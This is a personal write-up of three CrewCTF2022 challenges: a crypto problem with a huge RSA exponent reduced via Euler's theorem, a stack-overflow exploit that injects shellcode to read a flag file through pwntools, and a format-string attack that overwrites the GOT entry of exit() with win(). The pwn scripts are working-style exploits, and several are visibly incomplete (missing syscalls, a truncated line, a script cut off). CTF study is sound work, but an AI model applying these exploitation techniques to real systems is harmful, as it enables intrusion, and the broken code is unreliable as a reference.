CrewCTF2022 Writeup
Played CrewCTF2022 this weekend and solved some trivial challenges, recorded them here for remembering what I have done this weekend.
The HUGE e
from Cryptodome.Util.number import getPrime, bytes_to_long, inverse, isPrime
from secret import flag
m = bytes_to_long(flag)
def getSpecialPrime():
a = 2
for i in range(40):
while True:
b = getPrime(20)
if isPrime(a*b+1):
return a*b+1
p = getSpecialPrime()
e1 = getPrime(128)
e2 = getPrime(128)
e3 = getPrime(128)
e = pow(e1,pow(e2,e3))
c = pow(m,e,p)
assert pow(c,inverse(e,p-1),p) == m
print(f'p = {p}')
print(f'e1 = {e1}')
print(f'e2 = {e2}')
print(f'e3 = {e3}')
print(f'c = {c}')
I thought this challenge aims to test whether I know using ecm method to factor a big integer, however, I was wrong. The default factor method of sagemath is great. What matters is how to compute e
efficiently. What we only need is \(e \mod phi(p)\) so we need to make \(e2 \cdot e3\) smaller. We can use Euler’s theorem to solve the problem. As \(e_1^{phi(phi(p))} \equiv 1 \mod phi(p)\), we just need to compute \(e_2^{e_3} \mod phi(phi(p))\). Now we are done.
from Cryptodome.Util.number import long_to_bytes
p = 127557933868274766492781168166651795645253551106939814103375361345423596703884421796150924794852741931334746816404778765897684777811408386179315837751682393250322682273488477810275794941270780027115435485813413822503016999058941190903932883823
e1 = 219560036291700924162367491740680392841
e2 = 325829142086458078752836113369745585569
e3 = 237262361171684477270779152881433264701
c = 962976093858853504877937799237367527464560456536071770645193845048591657714868645727169308285896910567283470660044952959089092802768837038911347652160892917850466319249036343642773207046774240176141525105555149800395040339351956120433647613
phi = p - 1
e = e1.powermod(e2.powermod(e3, euler_phi(phi)), phi)
d = inverse_mod(e, phi)
m = c.powermod(d,p)
There is a stack overflow problem which can be found easily. What’s more, there is no NX. As a result, we can just inject shellcode to stack, and return to stack. The problem is I don’t know where the flag is at first and this problem is addressed after asking the admin and resulting in a challenge update. Although the challenge is quite straightforward, I met several problems. Because the ASLR, debug is hard without pwntools. I met a quirk problem when using pwntools, which is I cannot break at printf
because an unknown segfault. I solved this problem using one of feature of GDB, disabling ASLR, so, I can debug without pwntools.
import re
import pwn
pwn.context.update(arch='amd64', os='linux', encoding='utf-8')
my_pattern = re.compile("Special Gift for Special Person : (0x[0-9a-f]*)")
buffer_len = 0x108
# with pwn.process("./chall") as io:
with pwn.remote("", 1337) as io:
r = io.recvline()
addr = int(, 16)
shellcode = pwn.asm(f"""
mov rax, 2
mov rbx, 0x67616c662f66
push rbx
mov rbx, 0x74632f656d6f682f
push rbx
mov rdi, rsp
xor rsi, rsi
mov rbx, rax
mov rax, 0
mov rdi, rbx
mov rsi, {addr - 40}
mov rdx, 40
mov rax, 1
mov rdi, 1
mov rsi, {addr - 40}
mov rdx, 40
io.send(shellcode.ljust(buffer_len, b'\x00') + pwn.p64(addr))
r = io.recvrepeat(1)
I found a win()
function in symbols so I should redirect the control flow to it. In addition, there is a format string vulnerability in the binary and a call to exit()
just after the vulnerability. A straightforward idea is using the vulnerability to change the GOT of exit()
to the address of win()
. It’s possible because of no PIE.
import pwn
def fmt_str_64(init : bytes, offset, target, addr):
res = init
offset += 14
prev = len(init)
format_string = b""
for i in range(8):
t = (addr >> (8 * i)) & 0xff
pad = (t - prev) % 256
if pad == 0:
format_string += (f"%{offset + i}$hhn").encode()
format_string += (f"%0{pad}c%{offset + i}$hhn").encode()
prev = t
padded = format_string.ljust(112, b"a")
res += padded
for i in range(8):
res += pwn.p64(target + i)
return res
win_addr = 0x0040070a
exit_addr = 0x00601040
payload = fmt_str_64(b"", 6, exit_addr, win_addr)
# with pwn.process("./chall") as io:
with pwn.remote("", 1337) as io: